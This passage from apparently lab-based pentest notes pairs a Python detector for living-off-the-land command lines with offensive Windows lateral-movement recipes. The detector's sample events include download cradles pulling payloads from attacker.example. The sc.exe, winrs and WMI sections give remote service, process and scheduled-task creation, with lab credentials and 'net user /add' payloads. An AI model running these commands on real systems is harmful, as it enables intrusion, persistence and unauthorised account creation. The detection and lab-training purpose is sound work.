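    ("regsvr32_scriptlet", "high", r"regsvr32.*/i:https?://"),
    ("wmic_process_create", "medium", r"wmic.*process\s+call\s+create"),
    ("explorer_indirect_exec", "low", r"explorer(\.exe)?\s+/root,"),
    ("schtasks_powershell", "medium", r"schtasks.*/create.*powershell"),
    ("bash_wsl_exec", "low", r"bash(\.exe)?\s+-c\b"),
]
COMPILED = [(rid, sev, re.compile(rx)) for rid, sev, rx in LOLBIN_RULES]
SEVERITY_RANK = {"low": 1, "medium": 2, "high": 3}


def normalise(cmdline: str) -> str:
    """Lower-case and collapse whitespace so flag casing/spacing cannot dodge the patterns."""
    return re.sub(r"\s+", " ", cmdline).strip().lower()


def analyse(cmdline: str) -> Dict[str, object]:
    """Return the matched rule ids and an overall severity for one command line."""
    norm = normalise(cmdline)
    hits = [(rid, sev) for rid, sev, rx in COMPILED if rx.search(norm)]
    rules = [rid for rid, _ in hits]
    severity = max((sev for _, sev in hits), key=SEVERITY_RANK.get, default=None)
    # Two independent indicators on one line (e.g. hidden window + download cradle)
    # are a stronger signal than either alone, so escalate.
    if len(hits) >= 2:
        severity = "high"
    return {"rules": rules, "severity": severity}


def scan(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Run every event through analyse() and keep only those that matched a rule."""
    findings = []
    for ev in events:
        result = analyse(ev["cmdline"])
        if result["rules"]:
            findings.append({"host": ev["host"], "user": ev["user"],
                             "cmdline": ev["cmdline"], **result})
    return findings


# Constructed sample events (hypothetical hosts and users, not real logs). The first four
# command lines are the ones shown in the LOLBins entries; the last two are benign admin use.
SAMPLE_EVENTS = [
    {"host": "DESKTOP-1", "user": "za\\t1_leonard.summers",
     "cmdline": "powershell -NoP -NonI -W Hidden -Exec Bypass -Command \"IEX (New-Object "
                "System.Net.WebClient).DownloadString('http://attacker.example/payload.ps1')\""},
    {"host": "DESKTOP-1", "user": "za\\t1_leonard.summers",
     "cmdline": "certutil -urlcache -split -f \"http://attacker.example/payload.exe\" "
                "C:\\Users\\Public\\payload.exe"},
    {"host": "DESKTOP-2", "user": "za\\lab.user",
     "cmdline": "regsvr32.exe /s /n /u /i:http://example.com/file.sct Downloads\\live0fftheland.dll"},
    {"host": "DESKTOP-2", "user": "za\\lab.user",
     "cmdline": "schtasks /Create /SC ONLOGON /TN \"WindowsUpdate\" /TR \"powershell -NoP -NonI "
                "-Exec Bypass -Command IEX (New-Object Net.WebClient).DownloadString("
                "'http://attacker.example/payload.ps1')\""},
    {"host": "DESKTOP-2", "user": "za\\lab.admin",
     "cmdline": "powershell -NoProfile -Command Get-Date"},
    {"host": "DESKTOP-2", "user": "za\\lab.admin",
     "cmdline": "certutil -dump C:\\certs\\corp-root.cer"},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f['severity'].upper()}] {f['host']} {f['user']}: {', '.join(f['rules'])}")
        print(f"    {f['cmdline']}")
```

Feed it real 4688/Sysmon command lines and tune the low-severity rules (explorer /root, bash -c) to your environment's baseline before alerting on them.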

5. pyinstaller

# Creates binary 'script.exe'
pyinstaller --onefile script.py  

244 INFO: PyInstaller: 6.16.0, contrib hooks: 2025.9
244 INFO: Python: 3.8.10
260 INFO: Platform: Linux-5.15.0-124-generic-x86_64-with-glibc2.29
260 INFO: Python environment: /usr
261 INFO: wrote /root/script.spec
[...]
8524 INFO: Build complete! The results are available in: /root/dist


6. ps2exe

# Convert PS1 to EXE (binary)
ps2exe .\script.ps1 .\script.exe

7. sc.exe

Ports:

  • 135/TCP, 49152-65535/TCP (DCE/RPC)
  • 445/TCP (RPC over SMB Named Pipes)
  • 139/TCP (RPC over SMB Named Pipes)

💡Required Group Memberships: Administrators

# Create a remote service
sc.exe \\thmiis.za.tryhackme.com create WEVAservice-0001 binPath= "%windir%\wevaservice.exe" start= auto

[SC] CreateService SUCCESS
# Start a remote service
sc.exe \\thmiis.za.tryhackme.com start WEVAservice-0001
SERVICE_NAME: WEVAservice-0001 
        TYPE               : 10  WIN32_OWN_PROCESS  
        STATE              : 2  START_PENDING 
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x7d0
        PID                : 4976
        FLAGS              :


8. WinRM

Ports: 

  • 5985/TCP (WinRM HTTP) or
  • 5986/TCP (WinRM HTTPS)

💡Required Group Memberships: Remote Management Users

winrs.exe -u:t1_leonard.summers -p:EZpass4ever -r:10.200.48.201 ipconfig

Examples:                                                                                                       
winrs -r:https://myserver.com command                                                                           
winrs -r:myserver.com -usessl command                                                                           
winrs -r:myserver command                                                                                       
winrs -r:http://127.0.0.1 command                                                                               
winrs -r:http://169.51.2.101:80 -unencrypted command                                                            
winrs -r:https://[::FFFF:129.144.52.38] command                                                                 
winrs -r:http://[1080:0:0:0:8:800:200C:417A]:80 command                                                         
winrs -r:https://myserver.com -t:600 -u:administrator -p:$%fgh7 ipconfig                                        
winrs -r:myserver -env:PATH=^%PATH^%;c:\tools -env:TEMP=d:\temp config.cmd                                      
winrs -r:myserver netdom join myserver /domain:testdomain /userd:johns /passwordd:$%fgh789                      
winrs -r:myserver -ad -u:administrator -p:$%fgh7 dir \\anotherserver\share  


Winrs error:The WinRM client cannot process the request. Default authentication may be used with an IP address under the following conditions: the transport is HTTPS or the destination is in the TrustedHosts list, and explicit credentials are provided. Use winrm.cmd to configure TrustedHosts. Note that computers in the TrustedHosts list might not be authenticated. For more information on how to set TrustedHosts run the following command: winrm help config.
za\tony.holland@THMJMP2 c:\tools>winrs.exe -u:t1_leonard.summers -p:EZpass4ever -r:thmiis.za.tryhackme.com ipconfig

Windows IP Configuration

Ethernet adapter Ethernet 3:                                                                                                    

   Connection-specific DNS Suffix  . : eu-west-1.compute.internal                                                               
   IPv4 Address. . . . . . . . . . . : 10.200.48.201                                                                            
   Subnet Mask . . . . . . . . . . . : 255.255.255.0                                                                            
   Default Gateway . . . . . . . . . : 10.200.48.1


9. WMI

Ports:

  • 135/TCP, 49152-65535/TCP (DCERPC)
  • 5985/TCP (WinRM HTTP) or 5986/TCP (WinRM HTTPS)

💡Required Group Memberships: Administrators

# First create a credential

$username = 'Administrator';
$password = 'Mypass123';
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword;

# We then proceed to establish a WMI session using either of the following protocols:
# DCOM: RPC over IP will be used for connecting to WMI. This protocol uses port 135/TCP and ports 49152-65535/TCP, just as explained when using sc.exe.
# Wsman: WinRM will be used for connecting to WMI. This protocol uses ports 5985/TCP (WinRM HTTP) or 5986/TCP (WinRM HTTPS).

# Create a DCOM session

$Opt = New-CimSessionOption -Protocol DCOM
$Session = New-Cimsession -ComputerName TARGET -Credential $credential -SessionOption $Opt -ErrorAction Stop

# Spawn a process remotely

$Command = "powershell.exe -Command Set-Content -Path C:\text.txt -Value munrawashere";
Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{
  CommandLine = $Command
}

ProcessId ReturnValue PSComputerName                                            
--------- ----------- --------------                                            
     2808           0 thmiis.za.tryhackme.com

# Create a service remotely

Invoke-CimMethod -CimSession $Session -ClassName Win32_Service -MethodName Create -Arguments @{
  Name = "THMService2";
  DisplayName = "THMService2";
  PathName = "net user munra2 Pass123 /add"; # Your payload
  ServiceType = [byte]::Parse("16"); # Win32OwnProcess : Start service in a new process
  StartMode = "Manual"
}

ReturnValue PSComputerName                                                                                                      
----------- --------------                                                                                                      
         23 thmiis.za.tryhackme.com      

# Get a handle on the service and start it

$Service = Get-CimInstance -CimSession $Session -ClassName Win32_Service -filter "Name LIKE 'THMService2'"
Invoke-CimMethod -InputObject $Service -MethodName StartService

ReturnValue PSComputerName                                                                                                      
----------- --------------                                                                                                      
          0 thmiis.za.tryhackme.com 

# Create and execute a scheduled task remotely

# Payload must be split in Command and Args
$Command = "cmd.exe"
$Args = "/c net user munra22 aSdf1234 /add"
$Action = New-ScheduledTaskAction -CimSession $Session -Execute $Command -Argument $Args
Register-ScheduledTask -CimSession $Session -Action $Action -User "NT AUTHORITY\SYSTEM" -TaskName "THMtask2"

TaskPath                                       TaskName                          State      PSComputerName                      
--------                                       --------                          -----      --------------                      
\                                              THMtask2                          Ready      thmiis.za.tryhackme.com        

Start-ScheduledTask -CimSession $Session -TaskName "THMtask2"

# Delete the scheduled task

Unregister-ScheduledTask -CimSession $Session -TaskName "THMtask2"
# Install an MSI package

Invoke-CimMethod -CimSession $Session -ClassName Win32_Product -MethodName Install -Arguments @{PackageLocation = "C:\Windows\myinstaller.msi"; Options = ""; AllUsers = $false}

ReturnValue PSComputerName                                                      
----------- --------------                                                      
       1603 thmiis.za.tryhackme.com  

Images

Img1. Gophish

![Campaign Results](/pentest-tools/assets/images/Gophish campaign results.jpg) ![Campaign Results - Details](/pentest-tools/assets/images/Gophish campaign results_details.jpg)

Img2. DNSdumpster

System Location and A records; MX and TXT records; Map

Img3. Shodan

Vulnerable Apache

Img4. Spiderfoot

Scan Options; Scan Summary; Scan Browse; Scan Detail

Img5. Censys

Scan Summary; Report; Collections

Img6. InSSIDer

Network View; Network Details; Network Graph; Network Channels; Security Icons

Img7. Kismet

Kismet UI; Kismet SSID Info; Kismet Lock to AP channel; Kismet Device View; Kismet Device Info 1; Kismet Device Info 2; Kismet DeAuth Alert